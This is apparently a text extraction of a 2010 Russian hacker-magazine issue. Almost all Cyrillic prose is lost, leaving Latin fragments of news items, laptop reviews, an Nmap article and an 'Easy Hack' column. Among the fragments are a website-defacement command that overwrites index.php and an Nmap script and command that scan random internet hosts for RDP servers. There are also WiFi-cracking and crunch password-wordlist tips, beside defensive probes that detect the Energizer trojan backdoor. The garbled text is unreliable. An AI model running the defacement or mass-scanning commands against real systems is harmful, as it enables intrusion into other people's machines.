
.

60

x 06 () 2010

.
210
:

RING0- WINDOWS X64

06 (137) 2010

EARN
CASH
NOW!

WINDOWS

. 78

. 96

. 96

137

UBUNTU
ONLINE-


WINDOWS

OPENCART

-
. 54

INTRO
: , 17 ,
. , . , 1. 26
2010 - forum.anti-forum.ru ,
.
, web- www.upperlohi-online.ru CMS.

-,
.
-
,
,
.
r57shell,

. web- www.
upper-lohi-online.ru !
,
,
:
$ echo hucked buy megamozd! Gritz to anti-forum.ru kru! > /www/public_html/index.php

,

9 12 2010 .

:



272 273 .

.
,
,
1993
50 000 3
.
,
.
:
1.
,
.
2. ,
,

ip-, / ,
,
socks/vpn, .
3. : - ,
localhost - DVL
. , ,
.
nikitozz, . .

CONTENT
MegaNews

004

078

082

086

FERRUM
018

PC_ZONE
022
026

LBS-, GPS?
,

Nmap?

Ubuntu


Linux

090

poker room

096

Earn cash now!

-:

Windows:

030

100

online

034

106

036

Windows

SYN/ACK

Internet Explorer 9

Web-Services: -

C++

114

040

Easy-Hack

116

044

120

050

054

Opencart

125

060

064

066

070

X-Tools

NevoSoft

- Opencart

ring0-shellcode Windows x64


Ideco Control Server

iptables, ipfw pf

130

torrents.ru

132

PSYCHO:

138

FAQ UNITED

142

072

144

WWW2

BumpTop -

vs

vs

FAQ

8.5

web-

054

Opencart
- Opencart

090

poker room
-:

026

Nmap?

116


Ideco Control Server

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN/ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)

Dr. Klouniz
(alexander@real.xakep.ru)
>

> xakep.ru
(xa@real.xakep.ru)

/ART

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)

/DVD

>
Step
(step@real.xakep.ru)

> Unix-
Ant
>

/PUBLISHING
>
, 119021, , .
, . 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824


> GAMES & DIGITAL
(goryacheva@gameland.ru)

>




> Gameland TV

>
(strekneva@gameland.ru)
>

>


>
(ashomko@gameland.ru)
> -

>

(korenfeld@gameland.ru)
>

>

(andrey@gameland.ru)
>

(devald@gameland.ru)
>

(kosheleva@gameland.ru )

>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

. :

. ,

,
.
.


.
.

:
content@gameland.ru
, , 2010

MEGANEWS

MIFRILL

MARIA.NEFEDOVA@GLC.RU

MEGANEWS

Chatroulette! ( chatroulette.com),
.
,
( :).
2009 , 2010 - New York Times, Forbes New York
Magazine; South Park. , , -
, . - ,
hatroulette .
,
, , Skype, ICQ ,
, .
,
. , , ,
Chatroulette .


WIKIPEDIA
1
.

-
IPAD
McAfee DAT 5958, , ,
McAfee, Windows XP SP3.
, svchost.exe (Services) W32/
Wecorl.a, , .
, McAfee

, , ,
. epic fail! McAfee
(vil.nai.com/vil/5958_false.htm),
,
, , .
.

004

, iPad -
1200 . , ,
:
aMac.ru! , (
Apple) ,
. , , AppStore
. , Apple
,
AppStore, .
iPad, iTunes. ,
GiftCard, , (
). , jailbrake , George Hotz ( George Hotz)
iPad. Windows
95 Bosch.
X 06 /137/ 10

MEGANEWS

IPHONE

iPhone 4G ... Apple.


Gizmodo
, - Apple ,

, . Gizmodo

, ,
,
Gourmet Haus Staudt,
$5000!
, (1-
- ). -

,


Apple . ,
, . (
) ,
iPhone.
, , , .

, iPhone
3GS, , ,
.
, .
, iPhone - ,
,
( Apple

iPhone), ...
Apple
, c,
,
. ,
Gizmodo . Gizmodo

,
.
: ,

. SIM-
Micro-SIM.
, ,
960 640 .
, iPhone
3 ,
16%.
, ,
.
,
: ! Apple
. iTunes
iPhone.
iPhone ,
Apple.
Gizmodo ,
-
Apple. Apple .

, ,
PR- .

- :
- 10%.

WEBMONEY .
WebMoney .

-
,
.

+
,
WebMoney, , . ,

, .
,
,
.

ORACLE
, Sun Microsystems - ,

-.
- $7,4 , Sun
Oracle. , - .
, ,

006

, Java (
!), ,
Oracle, 2-
.
, ,
Sun TechDays, , Sun.
, ,
,

.

MEGANEWS

FACEBOOK

Facebook
, 2010-
,
,
. Facebook 400 -

.
,
Facebook SMS. , , ,
MySpace , . , ,
68 ,
. ,
Facebook ,
, .
Facebook . , f8
OpenGraph, ,
Facebook. ,
.
Facebook Connect (
).
Facebook -

, Facebook Connect, (
24 ). , !

BLU-RAY DISC ASSOCIATION ,


BLU-RAY 100 128 ,
100 .

GOOGLE?

, Google,
, . , Google
. ,

, , , , .

.
The New York Times , ,
,
Google
Gaia, .
Google
, ,
.

, ,

GMail, ,
,
IP-. :
, , ;

, . Google
.


,
, ,

Twitter. ,
, 2006 ,

. ,
,
.
20 -

008

( plain-!),
,
. ,
Twitter , , , Twitter
, -
.
,

,
.

MEGANEWS

, , , , ,
, . ,
:
.torrent-,
, . ,
, , , ,
www.icpp-online.com.
, , , ICPP
. RIAA,
MPAA The Copyright Alliance,
. , ,
, - ,
,
5 $250000. ,
, $400.
, ,
. ,
.

TIOBE
. 1- C, JAVA 2- ,
C++ 3- .

FOR THE HORD!

Creative,
Sound Blaster World of Warcraft Headset Sound
Blaster World of Warcraft Wireless Headset ( ). ,
MMORPG World of
Warcraft. WoW,

16 . : ( THX TruStudio PC) ,

Silencer, VoiceFX, , World of Warcraft. , .
6899 .
9299 . .

ICQ !
AOL
ICQ; Digital Sky
Technologies ( Mail.ru),
( - Rambler Media)
Tencent (
QQ,
). ,

AOL ,
. America Online

010

1998 ICQ 400 . 28


DST ,
- AOL
ICQ $187,5 . 18
$10 :)


MEGANEWS




HP All-in-One 200.
,
13
, tower-. All-in-One 200
HD- 21.5 . 30
;
. ,
All-in-One 200 ,
Intel Pentium E5400 c 2.7 , 4 DDR3,
Intel GMA X4500HD 500 .
- , 802.11 b/g/n -.
.
699 ,
.

:

100 . WINDOWS 7.

,
Paramount
Digital Entertainment Seagate
, FreeAgent Go
. ,
, . Paramount Pictures
21- , Star Trek (2009).
20, 10-15 , Seagate . 500- 50 ,
DVD- DRM-.
, - Seagate, ,
,

. 500 $140.

- . .
, , - GameStation. - :
- 1 4 2010 ..,
, ,
, . ,
5 ()
gamesation.
co.uk . , , ,
,
.

. , , 5 .
,
88% , 7500 .


MEGANEWS


. .
, ,
IT-,
. , 2009
: , , , ,
.
, .
, , , , .
, , ,
,
.
2010 1700
,
, ,
, .

, 5
Facebook iDefense.
(
)
Kirllos, Facebook
: $25-45 1000
/ ( ).

,
1,5 . . iDefense

,
. ,

Kirllos
/.
,
. ,
, ,

ZeuS. iDefense ,

700
( , $17,5
).

YOUTUBE 5 .



Sony
,
3.5,

2011 .
30
3,5
Sony 1981
.
720 (9 ),
1440
1,4 (18 ),

014

. Sony
70% ,

, ,
,
.
Sony ,
.
, , !

?..


, ICANN
(Internet Corporation for Assigned
Names and Numbers) , .
.
,
,

,

.
,
15


.
12

.

,

. . 21 ,
.
9936 , 5%
.
16 ,

.

...

!
Adobe Apple , Flash.

Flash, .
, Adobe
Flash iPhone. Adobe Creative Suite 5
Flash- iPhone
, .
Apple
, Android Google. Android ( Android-,
)
, iPhone, .

CANONICAL, UBUNTU- 12
. , 2008 8 .


GIGABYTE
GA-MA770TUD3P
Dell Studio
1515

FERRUM

Samsung
R580
HP Pavilion
dv6t

Acer Aspire
5740G


HP Pavilion
dv6t

Dell Studio
1515

ASUS
M4A78T-E

P Pavilion
dv6t

ASUS
M4A78T-E

, ,
,
, . ,
.
.

.
3DMark`06 PCMark Vantage.
, WinRAR, + ,
SuperPi,
( ). ,
: Resident Evil 5 Tom Clancys
H.A.W.X. , .
Battery Eater Pro v2.70. Balanced ().
, PCMark ( )
,
( ),
. PCMark Vantage , ,
, .

, - ,
, ,
. ,
, . ,
, -
,
.
, ,
. ,
, , , ,
, ,
, .

016

[Chart: BATTERYEATER. Series: Toshiba Qosmio X500, Samsung R580, MSI GT729, HP Pavilion dv6, Dell Studio 1515, Acer Aspire 5740G, Palit GeForce GT 240 Sonic]

MSI GT729,

[Chart: TOM CLANCYS H.A.W.X., fps. Series: Toshiba Qosmio X500, Samsung R580, MSI GT729, HP Pavilion dv6, Dell Studio 1515, Acer Aspire 5740G, Palit GeForce GT 240 Sonic]

fps HP Pavilion dv6,



[Charts: SUPERPI; WINRAR. Series: Toshiba Qosmio X500, Samsung R580, MSI GT729, HP Pavilion dv6, Dell Studio 1515, Acer Aspire 5740G]

,
, SuperPi ,

WinRAR CPU
Toshiba Qosmio X500, Intel Core i7

ACER ASPIRE
5740G

DELL STUDIO
1515

25300 .

25000 .

, -,
, ,
. !
, .
,
, ,
.

,
.
: eSATA, HDMI
mini FireWire. ,
.
, 100 .
web- ,
.

, : 2.1, INTEL CORE I3-330M


, : 3
: 15.6, 1366X768
, : 512, ATI MOBILITY RADEON HD 5470
, : 250
: DVD SUPER MULTI DL
: , GIGABIT LAN, BLUETOOTH, WI-FI
802.11B/G/N
: 4X USB, 1X HDMI, VGA, SD, MMC, XD, MS, MS PRO, S/
PDIF, MIC, EAR
, : 38325026~37
, : 2.8

DVI HDMI .

D-Sub. ,
.

, : 2, INTEL MOBILE CORE 2 DUO T6400


, : 2
: 15.6, 1280X800
, : 512, ATI MOBILITY RADEON HD 4570
, : 150
: DVD SUPER MULTI
: GIGABIT LAN, BLUETOOTH, WI-FI 802.11B/G/N
: 2X USB, VGA, 1X ESATA, 1X HDMI, 1X MINI FIREWIRE,
EXPRESSCARD, SD, MMC, MS, MS PRO, MIC, EAR
: WINDOWS VISTA HOME BASIC
, : 37125230
, : 2.7

. , , USB .
HDMI DVI.

017

GIGABYTE
GA-MA770TUD3P
Dell Studio
1515

FERRUM

Samsung
R580

30000 .

HP PAVILION
dv6t
:

, : 1.6, INTEL CORE I7-Q720M


, : 4
: 15.6, 1366?768
, : 1024, NVIDIA GEFORCE GT 230M
, : 250
: DVD SUPER MULTI DL
: GIGABITLAN, BLUETOOTH, WI-FI 802.11 B/G/N, IRDA
: 4X USB, VGA, 1X HDMI, 1X ESATA ( USB),
1X MINI FIREWIRE, SD, MS, MS PRO, MMC, XD, MIC, EAR, , EXPRESSCARD
: WINDOWS 7 HOME ADVANCED
, : 258X358X37
, : 3

Acer Aspire
5740G

MSI
GT729

, : 2.53, INTEL CORE 2 DUO P9500


, : 4
: 17, 1680X1050
, : 1024, ATI MOBILITY RADEON HD 4850
, : 300
: BD-ROM
: , GIGABIT LAN, BLUETOOTH, WI-FI 802.11
B/G/N
: 3X USB, 1X MINI FIREWIRE, 1X ESATA, 1X HDMI, VGA, SD,
PCMCIA, MIC, EAR
: N\A
, : 39527826.5~35
, : 3.2

. , :
, ,
, .
, . ,
, ,
,
. , .

GT , . : -
,
, . ( ),
( ).
Blu-ray , . ,
.

. , .
HDMI .

, , , .
. , PCMark
Vantage , .


Acer Aspire
5740G

SAMSUNG
R580

34000 .

, : 2.53, INTEL CORE I5-540M


, : 4
: 15.6, 1366X768
, : 1024, NVIDIA GEFORCE GT 330M
, : 500
: DVD SUPER MULTI DL
: GIGABITLAN, BLUETOOTH, WI-FI 802.11B/G/N
: 4X USB, USB SLEEP-AND-CHARGE, 1X HDMI, 1X ESATA
( USB), SD, SDHC, MMC, VGA, EXPRESSCARD, MIC, EAR,
: WINDOWS 7 PROFESSIONAL
, : 358X264X28.6~36.5
, : 2.7

,
, .
, . ,
, web-, .
USB-
.


.
HDMI.

,
MSI GT729,
,
Blu-ray.


Samsun
R580
HP Pavilion
dv6t

TOSHIBA QOSMIO
500
:

107500 .

, : 1.73, INTEL CORE I7-Q820


, : 4
: 18.4, 1920X1080
, : 1024, NVIDIA GEFORCE GTS 250M
, : 2X320
: DVD SUPER MULTI
: LAN, BLUETOOTH, WI-FI 802.11B/G/N
: 3X USB, 1X ESATA, 1X HDMI, 1X MINI FIREWIRE,
EXPRESSCARD, SD, MS, XD, VGA, MIC, EAR
: WINDOWS 7 ULTIMATE
, : 442.6294.241.5
, : 4.6

18,4
! , ,
, ,
.
:
, . , ,
: .

.
.
,
PCMark Vantage.

,

. Samsung R580

. ,

Toshiba Qosmio 500


,

( ),
. z

019

PC_ZONE
Step step@glc.ru

LBS-,

GPS?
,

GPS , .

,
.


GPS
,
,
.

.
GPS
.

3G,

020

.
online,

Location Based
. ,
GPS.

GOOGLE


. , Google .

,
,
www.google.com/latitude.
?
Google, ,
, . ,
,
, . ,
- GPS.

Twitter'
,

,
,

! LBS- GPS,
,
, Wi-Fi
( ).
,
. ,
, . ,
.
, ,
, , ,
. Google .

.
, -
, SMS!
, Twitter' , ,
.
.
SMS- , .
:
; (, ),
.
, .

,
.
,
, ,

, .

, ,
Gtalk
/ .

2.0

, , Google
,


.
,
: ,

. ,
Gowalla
(gowalla.com) Foursquare (foursquare.
com), ,
.

,

, .
, ,
.


.
, . ,
. , . check in :).

.
,
. ,
. , ,
Gmail', Twitter'
, . ,
,
GPS , ,

.

. - ,
,
. . Foursquare
:
, 50%
.. , , , .

,

Wi-Fi
iPhone, Android,
BlackBerry . , Windows
Mobile Symbian .
AlterGeo (altergeo.ru).

(WiFi+GSM+WiMax+IP),
, ,

. , AlterGeo
Google, . OpenStreetMaps,

.

, ,
, .
.
: ,
, ,
, , LBS-.

, -

GPS?
,
, .
CellID ( CID) , .
, CID .
,
.
, , .
, Google
. , .
? , .
, , , CellID ( GPS).
, ,
GPS (PDF- ).

021

PC_ZONE


Foursquare

Foursqure
..
. (http://mobile.yandex.ru/maps),
, .
, , . ,
.
.

40 /, , ,
. , , -
,
.
- ..
. ?
! ,
. . ,
,
- . ,
? ,
, ,
. . Windows
Mobile, Symbian, Java, Android Blackberry
130 , .
, , ,
, - . , , :
GPRS-,
.

Waze

wiki-,
GPS- ( ,
GPS-).
,
.
,
. Waze (www.waze.com)
,
. , , :
.
Waze
. ,
. .
;
( - OpenStreetMap). .
, ,
, - .
, ,
. Android,
iPhone, Windows Mobile Symbian. ,
.
, .
,
, - ,
.

, , .
! GPS-
( ), -

security-

WAZE

,
, .
,
. OpenStreetMap (www.
openstreetmap.org) -


PC_ZONE
STEP TWITTER.COM/STEPAH

INFO

info

FourSquare,

.

, ,
, ,

fourwhere.
com.

FourSquare.
Yahoo



Foursquare
$100 .

HTTP://WWW
links
,
.
-


.
: itag.com,
wavesecure.com.

024


Google


, .
,
, .
GPS-, .
Google,
Sky Map for Android (www.
google.com/sky/skymap). .
Android.
,
, GPS,
, ,
, ,
. GPS

,
.
,
, ,
,
. ,
,
,
, ! ? ,
,
Sky Map ! ,
, .
(
), ,

,
. :)

, .
,
. , , ! , . ,
Android (1.5 ),
.

GPS


,
. 3rdEye.
RPG
: ,
, .
:
( GPS, ), ,
. :
,
. .
:).
.
(
) ,
. ,
GPS- .
,
: GPS-
.
,
, , ,
. , www.geocaching.com www.
geocaching.su. z

AdWords:

10

, Google . -
1000 , ,
. .
? AdWords :
. , , ,
.

01


,
. /
/ :
.
,

,
/
3 ,
,
.
,
.

02



. ,
,

.

Google, AdWords

,


.

03

,
(quality

score),
:
CTR , ,
.. 3 ,
,
.
,

.
.

04



.


. AdWords

,

.
CTR
,
, ,
.

05



,
. Google

.
, :
, , .

.
: [].
, ,
,
,
.

06


,
, .

, , -,
, -,
.
, CTR
. ,
,
.

07



-,



, CTR.
, , ,
, data recovery,
-
.

08


,
.

,
,

. ,
,

, .

09

Google
Analytics
,
,

,
.

10

AdWords



AdWords.

,

.
,
AdWords
AdWords, Youtube
,
AdWords : +7 495 780 0022.

PC_ZONE
Step step@glc.ru

Nmap?

Nmap ][ , -,
. Nmap ,
. :
, ,
. .


, ,
,
,

,
changelog'.

.
NSE-

.

.
,
. -
. , ,
- ,

026

,
,
. ?

FINGERPRINTING

, ,
, ,
, , .
.
, Nmap? .

fingerprinting',


( Nmap

probe). WWW, .
,
.
, .
,
Energizer (
Meganews ). ,
-
,
Wayback Machine (web.archive.
org).
. ( ,
- ),
. www.symantec.com/connect/blogs/trojan-found-usb-battery-charger-software
,
:
7777 ;
,
, XOR- 0xE5
, ;
( ,
, ..) CLSID ( {XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX});
4 ,
.
"{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}" , . , YES, ,
, XOR' 0xE5. ,
,

Nmap

!
. , ,
( ), ( 7777) (YES);
.

? YES!

Symantec

NSE- Nmap

7777 .
netcat ( www.
securityfocus.com/tools/13
Windows).
XOR' ,
.
,

.
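#include <stdio.h>

/* XOR every byte read from stdin with 0xE5 and write it to stdout.
   The same filter both encodes a request and decodes a reply. */
int main(int argc, char *argv[])
{
    int c;
    while ((c = getchar()) != EOF)
        putchar(c ^ 0xE5);
    return 0;
}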

: ,
"XOR 0xE5"
, ,
:

NSE
Lua , Nmap
,
. %nmap%/nselib.
, , , DNS,
:
backdoor ;
bin ;
datafiles Nmap (, nmap-protocols );
default ;
dns DNS;
http HTTP;
msrpc MSRPC;
mysql MySQL;
netbios NetBIOS-;
nmap ;
packet RAW-;
proxy ;
shortport ;
smb SMB-;
ssh1/ssh2 SSH.
require.


$ gcc -o test test.c


$ echo "this is a test" | ./test | hexdump -C
00000000 91 8d 8c 96 c5 8c 96 c5 84 c5 91 80 96 91 ef |....A..A.A....i|

,
0xEF,
.
, .
echo "-n", , "-e",
escape- "\x00",
:
$ echo -ne "this is a test\x00" | ./test | hexdump -C
00000000 91 8d 8c 96 c5 8c 96 c5 84 c5 91 80 96 91 e5 |....A..A.A....a|

. "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}",
(38 + 1 -


NSE
= 39 ,
27):

WARNING

info


.




.




.

DVD
dvd


Nmap,

probe'.


echo -ne "\x27\x00\x00\x00{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}\x00"

, .
netcat' 7777
:
$ echo -ne "\x27\x00\x00\x00{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}\x00" |
    ./test | # XOR-encode the request with 0xE5
    ncat 192.168.1.123 7777 | # send it to port 7777
    ./test # XOR-decode the reply
:
YES

! YES , ! , fingerprinting
.

PROBE NMAP

,
,
Nmap'. ,
nmap-service-probes. c:\
program files\nmap (/usr/share/nmap /usr/local/share/
nmap ).
,
probe' . , netcat,
,
:
# Energizer trojan
Probe TCP Energizer q|\xC2\xE5\xE5\xE5\x9E\xA0\xD7\xA4\xA6\xD0\xD5\xDD\xDC\xC8\xD6\xDD\xD7\xD5\xC8\xD1\xD6\x83\x80\xC8\xDD\xA4\xD1\xA1\xC8\xA4\xD2\xD5\xD7\xDD\xA3\xA4\xA1\xDD\xA6\xD7\xDD\x98\xE5|
rarity 8
ports 7777
match energizer m|^\xbc\xa0\xb6$| p/Energizer backdoor/ o/Windows/ i/**BACKDOOR**/

Zenmap
,

: fingerprinting . fingerprinting-
Probe, "q|" "|"
. rarity . Ports , .
match Perl-
, Nmap. Nmap
7777 ,
Netcat'.
YES,
. :
$ nmap -sV -p7777 192.168.1.2
Starting Nmap 5.30BETA1 ( http://nmap.org )
Nmap scan report for 192.168.1.2
Host is up (0.00024s latency).
PORT     STATE SERVICE   VERSION
7777/tcp open  energizer Energizer backdoor (**BACKDOOR**)
Service Info: OS: Windows

, , Nmap . ,

Nmap.
, . -
Nmap,
.

NSE ?

, ? Nmap Scripting Engine (NSE),


4.21 ,
6 .
, Nmap
, NSE-.
, (5.30BETA1) 37 : http-vmware-pathvuln, VMware; mysql-empty-password,

, ..
Nmap 117, .

INFO

info

Nmap
,

. , Energizer,

. ,
,
, ,
.
, NSE
Nmap, .
Lua (www.lua.ru). , , NSE Python (
),
, , . , Lua, Python,
( ); Nmap.

NMAP

NSE-
.
.
description ;
categories ;
author ;
license ;
dependencies ;
port/host rules ;
action , .
Nmap nmap.org/
book/nse.html,
. .
-,
RDP-. RPD- Nmap.
NSE-,
. Lua:
description = [[ RDP Servers search tool ]]
author = "X Group"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"discovery"}
require "shortport"
-- Run only against port 3389 or a service detected as ms-term-serv
portrule = shortport.port_or_service(3389, "ms-term-serv")
action = function(host, port)
    -- Append the address of the matching host to the result file
    local file = io.open("ip_with_rdp.txt", "a+")
    file:write(host.ip .. "\n")
    file:flush()
    file:close()
end

. NSE- "discovery",
, .
require NSE-
.
.
(portrule),
, ,
(hostrule).
, true false. , ,
action, . portrule
port_or_service ,
3389 , ms-term-serv.
, ,
. Nmap
RDP- 3389 ,
IP- .
(, rpdlist.nse)
scripts. ,

lua, , Notepad++,
. ,
"--script" "-sC":
nmap -iR 0 -n -PS 3389 -p T:3389 --script=rpdlist.nse

RPD -.
MSRPC,

.
, . NSE nmap.org/book/nse.html,
Nmap ..z

Nmap,
:
,
?.
scanme.
nmap.org.

.
,
,
nmap
"--script-updatedb":
nmap --script-updatedb

Nmap'


.

ncat,


nc.

TCP,
UDP,

HTTP/CONNECT
SOCKS.



ndiff.

nping
,

.

029

PC_ZONE
Step step@glc.ru


, - -
. ,
,
. .

.
, -
-
.
,
. ,

IDE.

030


Ctrl-F7,
.
, .
:
cmpe150-1.cmpe.boun.edu.tr/phpccompiler/
login.php,
Internet Explorer. C++.
?

++,
. , Comeau C/C++ ,
-
(www.comeaucomputing.com/tryitout).

, Comeau,
,
.
, Comeau


exe-

Hex- Ajax

C++0x
(
++),
Visual Studio 2010.
-
,
ideone (ideone.com) 40 .
/C++
Java, C#, Pascal, Visual Basic .NET,
, .
: 10
, 5 , 256
. ,
. ,
codepad (codepad.org).

asm-

HEX PE-

,
. ? , HEX-
-

,
, .
HexPaste (hexpaste.com)
, : !.
, HEX-

? .

(, hexpaste.com/WvwX04eV),
- .

(). AJAX', , , .
,
PE-.
PE-,
,
,
exe .
proview phpp (pvdasm.reverseengineering.net/PVPHP.php)
, / (, , ,
API- ) ..

, proview phpp
.
,
, (SoftICE,
IDA, W32Dasm, Ollydbg). , ,

100 .
, Pym's
online disassembler (pyms86.appspot.com),
Google App Engine.
, ,
HEX-. 64- ,
Python- Pym (code.google.com/p/
pymsasid), pefile (code.google.com/p/pefile)
networkx (networkx.lanl.gov),
. ,
, .

, , .
Amy Editor (www.amyeditor.com). ,
.
: C, Java, Javascript,
PHP, Python, Ruby on rails, Ruby, Texy, HTML/
XML-. /,

PC_ZONE

Python

Notepad++,

( , Python),
,
.
. ,
( ).
:
Bespin Mozilla (bespin.mozillalabs.com)
- (HTML/JavaScript);
CodeMirror (marijn.haverbeke.nl/codemirror) JavaScript
, : JavaScript, XML/HTML, CSS, Python, Lua, Ruby, SQL;
Ymacs (www.ymacs.org) Emacs- ,
Ajax.
. ,
, , Kodingen.

Visual Studio , , IntelliSense, ASP.NET,


PHP, Ajax, WPF !
C#/.NET (3.5), PHP (5.1), JavaScript, HTML CSS.
C#
Microsoft: ASP.NET, WCF, Silverlight WPF.
SQL Server 2005 Amazon SimpleDB.
, . ASP.NET SQL Server, coderun . , ? -, coderun
.NET ,
. ,
-. , watch', ,
callstack .
IDE . , , coderun .
,
.

IDE

Kodingen,
, .
,
, , !
IDE , !

, .
.
colaboration ,
: svn, git, mercirual! FTP .
Kodingen.
( , ). - -,
SSH! !

VISUAL STUDIO

,
Perl/Python/PHP , .
, , C#? - -, Microsoft?
! Visual Studio
, coderun (www.
coderun.com). .

032

,
, - , XML-,
, ,
WWW2 Pastie (pastie.org). ,
(, C++ Python). ,
,
. 38
, -
. ,
. Ruby, TextMate. Pastie
, . Snipplr
.
, .


, , RegexBuddy.
. , , .
- RegExr (www.
gskinner.com/RegExr), Flex-.

Emacs
? Flex'
.

, .
, .
,
. ,
,
. ,
,
, -
.
,
RegExr'.

. ,
,
, ,

. , www.
regexlib.com.

, , IDE



, .

Visual Studio vs. coderun

Bespin Kodingen



INFO
, .
,
,
Teamer' (www.teamer.ru).
.
, ! :) z

info
Python,
Silverlight,
Try Python
(www.trypython.org).
Utility
Mill (utilitymill.com),
Python-

-.

FTP-
.

net2ftp (www.
net2ftp.com).
PHP
IDE
phpAnyware
(phpanywhere.net).

FTP,

.


PC_ZONE
STEP TWITTER.COM/STEPAH



Internet Explorer


IE
. Internet Explorer Platform Preview (ie.
microsoft.com/testdrive),
, .
Direct2D
GPU.
JavaScript.
,
,
: CSS3, , SVG,
HTML5.


:). , ,
,
.
,
Javascript
.
,
. , ,
.
, .

. IE9 c JavaScript.
Chakra.
,
. SunSpider
, IE9

034

Internet Explorer,
,
. ! :)
IE
, W3C
Microsoft.
Internet Explorer,
.
IE8.
IE , Chrome Opera.
: ,
,
.
, ,
SunSpider,
.

ACID

ACID3, IE9
. . ACID 2,
ACID3 ,
.
,
,
. , ACID3
,
, - . IE9 ACID3 100%?
. .
IE9,
, -
, ,
,
,
.
IE8, CSS
8000 .


, . ,
, ,

. , . ,
,
,
.
IE6. , ? :
, , IE6.
, Chrome,
Internet Explorer
:). ,

6- IE. , Internet
Explorer 9 Windows XP;
. Windows
DEP ASLR.
Direct2d, .


- IE Microsoft
, . ,
, , .
: ,
Network Monitoring .
, Fiddler (www.fiddler2.com),
.
network-, ,
.
. ?
, .z

JOIN US!
group.xakep.ru
-

vkontakte.ru/club10933209

udalite.livejournal.com
nikitozz

www.twitter.com/stepah
Step

www.ring0cup.ru
-

facebook.com gid=326597299563
Facebook

PC_ZONE
Step step@glc.ru

Windows

- Linux .
, ,
.

. -
. !

, Microsoft
.
,
?
.

, ,

036

Linux.

, ,

. ,
, -
.

,
. , !
,

( ),
, ,

, Ninite


,

. :
, ,
.
, , /
, PDF,
, , Java/.
NET Framework/Flash, .
! :)
,
Dailysoft ][,
:
? ,
.
, -
www.ninite.com.
. ? .


,
: , ,
..

Get Installer.

,
.

. , , . , , ? !
, , , ,
, offline-


allmyapps

,
.

- Ninite
.
, ,
-
.
, www.allmyapps.
com. Ninite,


( ).

,
Allmyapps
,
. ,

.
ZeuAPP (blog.zeusoft.net/
zeuapp),
.
,


,
. ! .
Windows 7, : !. , Windows
Update , . ,
.
?
DriverMax (www.innovative-sol.com/drivermax).
.

, . ,
,
. Drivermax
. . , DriverMax , Device
Doctor (www.devicedoctor.com).

037

PC_ZONE

security-

- Google
- Google Chrome, :
- -,
, , ,
. -
pack.google.com, , , ,
Google. Google Update omaha.
code.google.com/p/omaha. ,
, ,

, ,
- Linux.

DVD
dvd


(
Dailsoft),
,

038

. , Download
, ,
. ,
: .
. -

, ZeuAPP .

.

Secunia
Personal Software Inspector.

,
.
(
Secunia ) , ,
. .
, ,
- ,
.
(Adobe Flash Player,
QuickTime, Sun Java ..),
(, Skype). ,
, ActiveX- ,
Secunia PSI .

,
, Adobe Reader'
, .
,
, . , , ,
Windows-
.
,
.
security- Secunia.
, , -

, Magic UnInstall

HTTPS- , , .
,
,
. Secunia . RSS-
Java,
PSI
. -
, , security. ,
PSI Secunia System
Score.
86%. ?

-?

,
- ,
. ,

. , Secunia PSI
,
,
-? ?
fileforum.betanews.com
www.filehippo.com. ,
FileHippo ,
,
, . ,
FileHippo.com Update Checker, ,
Secunia, . ...

- , . ,
FileHippo.com Update Checker PSI , .
, ? :)

exe ,

. , :
,
. ? Ashampoo
Magical UnInstall
. . ,

,
,
ReInstaller. Magical UnInstall
, .

Linux? ,
. , , , , -
apt-get .
Microsoft? .
.
Google Code, SourceForge , - .
: ,
, ? ,
,
Linux.z

INFO

info





. SUMo (www.
kcsoftwares.com)
Appupdater (www.
nabber.org/projects/
appupdater).


apt-get

win-get (windows-get.
sourceforge.net). Pascal'

, , ,

.

: Appsnap,
Appupdater

GetIt (www.
puchisoft.com/GetIt).

,
: , . ,

, :). , ,
, ,
Microsoft , .
. ! , , ,
, . , -
.
,
,

..
, Ashampoo Magical UnInstall (www.ashampoo.
com). ?
. ,
setup.exe, install.


GreenDog agrrrdog@gmail.com

Easy Hack
1

: -
apach 20

:

. , CMS-, -
,
. , ,
( ) site, inurl, filetype ..,
, . .
URL- DirBuster, OWASP.
owasp.org/index.php/Category:OWASP_DirBuster_Project

Java-
( 6000 )! 300
.
:
1. , ;
2. ;
3. HTTP-;
4. HTTP-;
5. URL fuzzing;
6. , .

, .
,
. URL fuzzing. ,
, URL , {dir}.
:
/show.php?p={dir}.html

:
, .
, .
,
, , .
,
, , . . , WiFi-
, aux. ,
,

040

{dir} .
, .
(1.0rc1) , (0.12). .
, , GUI ,
. .
, (. ),
DirBuster ,
, .

. .
:
habrahabr.ru/blogs/modding/46483/

d-link, ,
. , .
. WiFi, , ,
, .
USB WiFi- (
). , 500 .
, , USB-, . USB

5 , , , .
.
WiFi-, +5 dBi. , . :
korolshop.narod.ru/WiFi/wifi.htm

. WiFi--

, .
forum.antichat.ru/showthread.php?t=57249

: BackTrack
VMware, WiFi- ,
BackTrack ( WiFi). rt2570 rt73 , .

:
.
,
, . , ?
,
- , , .
, crunch.
BackTrack .
2.4 .
:
sourceforge.net/projects/crunch-wordlist/

, ( stdout), , ,
DirBuster. ,
, ,
.
./crunch 4 6 -f charset.lst mixalpha-space -o START -c 100000

4 6 ,
-f charset.lst mixalpha-space charset.lst,
, .
-o START -c 500000 , 100000
.
, , , r.
, charset.lst , , , . ,
crunch. , :

crunch.
:

cDOGd9%
cDOGd9^
dDOGA1@
dDOGA1#


(-t), @ , % , ^ . wordlist.txt.

m. ,
:
./crunch 1 1 -m Happy Birthday Masha

:
rualpha=[]

, rualpha
crunch.
./crunch 7 7 -t @DOG@%^ ABCDabcd 1369 @#$%^ -o wordlist.txt

: PORTABLE-
.

:

, , ,

MashaBirthdayHappy
MashaHappyBirthday
BirthdayMashaHappy

